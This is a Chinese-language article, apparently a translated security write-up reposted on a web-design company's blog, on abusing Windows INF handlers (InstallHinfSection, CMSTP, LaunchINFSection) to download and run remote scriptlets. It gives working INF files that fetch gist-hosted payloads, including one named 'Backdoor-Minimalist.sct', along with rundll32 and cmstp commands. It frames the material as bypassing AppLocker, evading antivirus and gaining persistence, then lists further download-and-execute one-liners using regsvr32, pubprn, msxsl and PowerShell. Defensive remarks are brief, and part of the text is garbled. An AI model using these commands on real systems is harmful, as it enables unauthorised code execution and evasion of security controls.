本篇文章為大家展示了如何利用INF Script下載執(zhí)行技術(shù)來進行繞過、免殺和持久化，內(nèi)容簡明扼要并且容易理解，絕對能使你眼前一亮，通過這篇文章的詳細介紹希望你能有所收獲。

成都創(chuàng)新互聯(lián)公司專注于高昌企業(yè)網(wǎng)站建設(shè),響應(yīng)式網(wǎng)站建設(shè),商城系統(tǒng)網(wǎng)站開發(fā)。高昌網(wǎng)站建設(shè)公司,為高昌等地區(qū)提供建站服務(wù)。全流程按需求定制制作，專業(yè)設(shè)計，全程項目跟蹤，成都創(chuàng)新互聯(lián)公司專業(yè)和態(tài)度為您提供的服務(wù)

簡介

通過對MSDN上一些處理不同COM腳本的調(diào)查和測試，結(jié)合網(wǎng)上的分享，我發(fā)現(xiàn)了一些有意思的東西，這些發(fā)現(xiàn)可能是遠程調(diào)用執(zhí)行腳本新方法。
其中最有意思的是LaunchINFSection。

這篇文章主要討論一下網(wǎng)上公開的利用INF Script的方法，并介紹下LaunchINFSection，最后再分享一些用法和作為防御者應(yīng)該注意的事項。另外，還會給出一些其他遠程執(zhí)行腳本方法的參考。

INF Script執(zhí)行方法

通過INF配置文件來執(zhí)行腳本文件（.sct）的方法會涉及到InstallHinfSection(setipapi.dll)，CMSTP和LaunchINFSection(advpack.dll)。

使用InstallHinfSection執(zhí)行INF Script腳本

在DerbyCon 2017中KyleHanslovan和ChrisBisnett展示了一個非常有意思的東西，我已經(jīng)將其翻譯和整理過來（傳送門：透過Autoruns看持久化繞過姿勢的分享 ）。他們展示 了一種通過INF 遠程調(diào)用執(zhí)行sct腳本文件的方法：
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 [path to file.inf]

作者給出的INF文件如下：

1. ;----------------------------------------------------------------------

2. ;RequiredSections

3. ;----------------------------------------------------------------------

4. [Version]

5. Signature=$CHICAGO$

6. Provider=test

7. Class=Printer

9. [Manufacturer]

10. HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64

12. ;----------------------------------------------------------------------

13. ;ModelsSection

14. ;----------------------------------------------------------------------

15. [ModelsSection.NTx86]

16. UnregisterDlls=Squiblydoo

18. [ModelsSection.NTia64]

19. UnregisterDlls=Squiblydoo

21. [ModelsSection.NTamd64]

22. UnregisterDlls=Squiblydoo

24. ;----------------------------------------------------------------------

25. ;SupportSections

26. ;----------------------------------------------------------------------

27. [DefaultInstall]

28. UnregisterDlls=Squiblydoo

30. [Squiblydoo]

31. 11,,scrobj.dll,2,60,https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Minimalist.sct

上面的命令會去調(diào)用默認INF塊，即DefaultInstall，在這個塊下，通過UnregisterDlls調(diào)用了Squiblydoo塊下的惡意命令，通過scrobj.dll下載并執(zhí)行指定的腳本文件。

使用CMSTP執(zhí)行INF Script腳本

NickTyrer展示了一種用cmstp.exe加載INF文件來下載SCT腳本并執(zhí)行COM腳本文件的方法。Oddvarmoe曾展示了用cmdtp.exe來繞過UAC和AppLocker默認策略。
基本用法如下：
cmstp.exe /s [file].inf

INF文件內(nèi)容參考如下：

1. ;cmstp.exe/s cmstp.inf

3. [version]

4. Signature=$chicago$

5. AdvancedINF=2.5

7. [DefaultInstall_SingleUser]

8. UnRegisterOCXs=UnRegisterOCXSection

10. [UnRegisterOCXSection]

11. %11%\scrobj.dll,NI,https://gist.githubusercontent.com/NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f/raw/676451571c203303a95b95fcb29c8b7deb8a66e0/powersct.sct

13. [Strings]

14. AppAct="SOFTWARE\Microsoft\Connection Manager"

15. ServiceName="Yay"

16. ShortSvcName="Yay"

通過如上的INF文件，cmstp.exe會調(diào)用文件中的DefaultInstall_SingleUser塊。在這個塊中，UnRegisterOCXs調(diào)用了UnRegisterOCXSection塊來執(zhí)行惡意操作，通過scrobj.dll來下載并執(zhí)行指定的SCT腳本文件。

使用LaunchINFSection執(zhí)行INF Script腳本

根據(jù)MSDN的說明，LaunchINFSection是Advanced INF Package Installer（advpack.dll）的一個方法，用來調(diào)用INF文件中的某個塊。從管理員的角度看，INF文件是一個用來安裝設(shè)備驅(qū)動或Windows .cab文件的指令文件，包括注冊Windows二進制（exe,dll,ocx），在注冊表中增加鍵值，或設(shè)置一些關(guān)鍵參數(shù)的操作。
調(diào)用LaunchINFSection的方法如下：
rundll32.exe advpack.dll,LaunchINFSection [file].inf, [INF Section], [Path to Cab].cab, [Installation Flags]
如果不指定[INF Section]，LaunchINFSection將會調(diào)用默認的DefaultInstall塊。另外，值得注意的是，advpack.dll還提供了LaunchINFSectionEX方法和與其它字符集兼容的LaunchINFSectionA，來完成LaunchINFSection同樣的功能。

作為PoC例子，我們使用如下的INF和SCT文件來測試：

INF文件（保存為test.inf）：

1. ;cmstp.exe/s cmstp.inf

3. [version]

4. Signature=$chicago$

5. AdvancedINF=2.5

7. [DefaultInstall_SingleUser]

8. UnRegisterOCXs=UnRegisterOCXSection

10. [UnRegisterOCXSection]

11. %11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct

13. [Strings]

14. AppAct="SOFTWARE\Microsoft\Connection Manager"

15. ServiceName="Yay"

16. ShortSvcName="Yay"

SCT文件：

5.    description="Bandit"

6.    progid="Bandit"

7.    version="1.00"

8.    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"

9.    >

11.    

12.    

13.    

14.    

15.    

18.    

19.        

20.    

21.        

23.            var r=newActiveXObject("WScript.Shell").Run("calc.exe");

25.        ]]>

26.    

30.    

35.    functionExec()

36.    {

37.        var r=newActiveXObject("WScript.Shell").Run("notepad.exe");

38.    }

40. ]]>

使用下面的命令來執(zhí)行一下：
rundll32.exe advpack.dll,LaunchINFSection test.inf,DefaultInstall_SingleUser,1,

如果網(wǎng)絡(luò)沒有問題的話，會出現(xiàn)我們可愛的計算器：

這里，我們還可以用稍微不同的方法啟動我們的程序，例如，把INF文件中的入口塊改成DefaultInstall，那么我們就可以使用下面的命令執(zhí)行程序，而無需指定一個塊名字：

rundll32.exe advpack.dll,LaunchINFSection test.inf,,1,

另外，我們也可以將卸載OCX的命令改成一個安裝/注冊的命令RegisterOCXs，并且隨便一個名字來運行我們的程序：

使用和防御方法

惡意軟件

繞過，免殺和持久化

CMSTP可用來繞過Autoruns（當(dāng)開啟隱藏Windows條目時），如下圖：



當(dāng)不啟用隱藏過濾功能時，CMSTP做的自啟動項如下：

注意：LaunchINFSection和InstallHinfSection不會以繞過新版本的Autoruns，因為這種啟動方法依靠rundll32.exe調(diào)用相應(yīng)的dll。當(dāng)啟用過濾時，Autoruns還是會顯示這些自啟動項。但是，LaunchINFSection提供了我們一種通過程序白名單繞過AppLocker規(guī)則來獲得代碼執(zhí)行的技術(shù)。

網(wǎng)絡(luò)中的流量

下圖是通過scrobj.dll來下載一個SCT文件時產(chǎn)生的流量：

任意文件名

SCT文件只不過是text/XML文檔，而INF文件只不過是text文檔，其后綴擴展名可以不是.sct或.inf，但依然可以成功執(zhí)行。（此處譯者并沒有實驗成功，希望各位表哥賜教?。?/p>

其它方法

使用INF文件執(zhí)行并不是唯一可以執(zhí)行SCT腳本文件的方法，還有一些其它方法：

RegSvr32/Scrobj.dll

RegSvr32/Scrobj.dll

regsvr32 /s /n /u /i: http://url/file.sct scrobj.dll

PubPrn

PubPrn

pubprn.vbs 127.0.0.1 script:http ://url/file.sct

通過PowerShell拼接Microsoft.JScript.Eval

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script: http://url/file.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

通過PowerShell拼接Microsoft.VisualBasic.Interaction

[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script: http://url/file.sct').Exec(0)

值得注意的是，sct并不是唯一一種文件，還有其他的，如：

MsXSL

MsXSL

msxsl.exe http://url/file.xml http://url/file.xsl

通過PowerShell拼接System.Xml.Xsl.XslCompiledTransform

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('http://url/file.xsl',$s,$r);$x.Transform('http://url/file.xml','z');del z;

上述內(nèi)容就是如何利用INF Script下載執(zhí)行技術(shù)來進行繞過、免殺和持久化，你們學(xué)到知識或技能了嗎？如果還想學(xué)到更多技能或者豐富自己的知識儲備，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。